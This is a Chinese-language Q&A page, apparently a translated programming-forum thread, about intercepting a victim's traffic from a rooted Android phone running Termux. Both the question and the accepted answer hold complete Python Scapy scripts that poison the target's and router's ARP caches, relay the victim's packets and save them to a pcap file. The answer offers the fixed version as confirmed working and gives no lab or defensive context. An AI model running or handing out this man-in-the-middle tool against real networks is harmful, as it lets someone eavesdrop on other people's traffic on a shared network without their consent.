使用 Termux 在已 root 的 Android 上进行 IP 转发

问题描述 投票:0回答:1

是否可以在 Termux(root Android)上通过 ARP 欺骗来拦截流量?

我有这个Python脚本:

from scapy.all import *
from scapy.interfaces import *
from threading import Thread
import logging
import time
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)


def arp_spoofing():
    eth = Ether()
    arp = ARP(pdst=target_ip, psrc=gateway_ip, op="is-at")
    packet = eth / arp

    while True:
        sendp(packet, iface=iface, verbose=False)
        time.sleep(2)


def get_mac(ip):
    arp_request = ARP(pdst=ip)
    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request

    answ = srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    try:
        return answ[0][1].hwsrc
    except:
        get_mac(ip)


def forward_packet(pkt):
    if pkt[Ether].src == target_mac and pkt[Ether].dst == attacker_mac:
        pkt[Ether].src = attacker_mac
        pkt[Ether].dst = gateway_mac
        sendp(pkt, verbose=False)
    elif pkt[Ether].src == gateway_mac and pkt[Ether].dst == attacker_mac:
        pkt[Ether].src = attacker_mac
        pkt[Ether].dst = target_mac
        sendp(pkt, verbose=False)
    wrpcap(filename, pkt, append=True)
    print(f'-----------------------------------------\nPacket intercepted:\nfrom: {pkt[IP].src}\nto: {pkt[IP].dst}\n')
    layers = []
    for i in range(len(pkt.layers())):
        layers.append(pkt.getlayer(i).name)
    print(f'Network layers: ', end='')
    print(*layers)
    if TCP in pkt:
        print(f'TCP port: {pkt[TCP].dport}')
    print('-----------------------------------------')


def sniffer():
    while True:
        sniff(prn=forward_packet, filter=filter, iface=iface, count=1)


iface = get_working_if()
filename = input('Name of .pcap file: ') + '.pcap'
target_ip = input('Target IP in local network: ')
target_mac = get_mac(target_ip)
gateway_ip = input('Router IP in local network: ')
gateway_mac = get_mac(gateway_ip)
attacker_mac = Ether().src
filter = f'(ip src {target_ip}) or (ip dst {target_ip})'

mitm = Thread(target=arp_spoofing)
proxy = Thread(target=sniffer, daemon=True)
proxy.start()
mitm.start()

它似乎可以在 Linux 桌面上使用 net.ipv4.ip_forward=1 运行,所以我尝试在我的 Android 手机上启用 ip_forward。

我尝试过以下命令: 1.

echo 1 | sudo grep /proc/sys/net/ipv4/ip_forward
sudo sysctl net.ipv4.ip_forward=1

它将所需的参数从 0 更改为 1,但我需要重新启动设备才能使 IP 转发工作。所以,当我这样做时,ip_forward又变成0了。

我应该怎样做才能启用 IP 转发并使此更改持久化(重新启动时保存它们)? 或者我可以使用 Scapy 和 Python 重定向流量吗?

python android scapy termux sysctl
1个回答
0
投票

看来我已经找到解决办法了。无需启用 ip_forward。我已经更改了代码,现在可以使用了:

from scapy.all import *
from scapy.interfaces import *
from threading import Thread
import logging
import time
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
 
 
def fprint(data):
    sys.stdout(data)
 
 
def arp_spoofing():
    eth = Ether()
    arp1 = ARP(pdst=gateway_ip, psrc=target_ip, op="is-at")
    arp = ARP(pdst=target_ip, psrc=gateway_ip, op="is-at")
    packet = eth / arp
    packet1 = eth / arp1
 
    while True:
        sendp(packet, iface=iface, verbose=False)
        sendp(packet1, iface=iface, verbose=False)
        time.sleep(10)
 
 
def get_mac(ip):
    arp_request = ARP(pdst=ip)
    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request
 
    answ = srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    try:
        if answ[0][1].hwsrc is not None:
            return answ[0][1].hwsrc
        else:
            get_mac(ip)
    except:
        get_mac(ip)
 
 
def forward_packet(pkt):
    if pkt[Ether].src == target_mac and pkt[Ether].dst == attacker_mac:
        pkt[Ether].src = attacker_mac
        pkt[Ether].dst = gateway_mac
        sendp(pkt, verbose=False)
    elif pkt[Ether].src == gateway_mac and pkt[Ether].dst == attacker_mac:
        pkt[Ether].src = attacker_mac
        pkt[Ether].dst = target_mac
        sendp(pkt, verbose=False)
    wrpcap(filename, pkt, append=True)
    print(f'-----------------------------------------\nPacket intercepted:\nfrom: {pkt[IP].src}\nto: {pkt[IP].dst}\n')
    layers = []
    for i in range(len(pkt.layers())):
        layers.append(pkt.getlayer(i).name)
    print(f'Network layers: ', end='')
    print(*layers)
    if TCP in pkt:
        print(f'TCP port: {pkt[TCP].dport}')
    print('-----------------------------------------')
 
 
def sniffer():
    sniff(prn=forward_packet, filter=filter, iface=iface)
 
 
iface = get_working_if()
filename = input('Name of .pcap file: ') + '.pcap'
target_ip = input('Target IP in local network: ')
target_mac = get_mac(target_ip)
gateway_ip = input('Router IP in local network: ')
gateway_mac = get_mac(gateway_ip)
attacker_mac = '<MY MAC ADDRESS>'
filter = f'(ip src {target_ip}) or (ip dst {target_ip})'
 
mitm = Thread(target=arp_spoofing, daemon=True)
proxy = Thread(target=sniffer)
proxy.start()
mitm.start()

现在它按照我想要的方式工作了。目标保持与网络的连接,并且攻击设备拦截其流量。 我希望我的回答能够帮助面临类似任务的人。

© www.soinside.com 2019 - 2024. All rights reserved.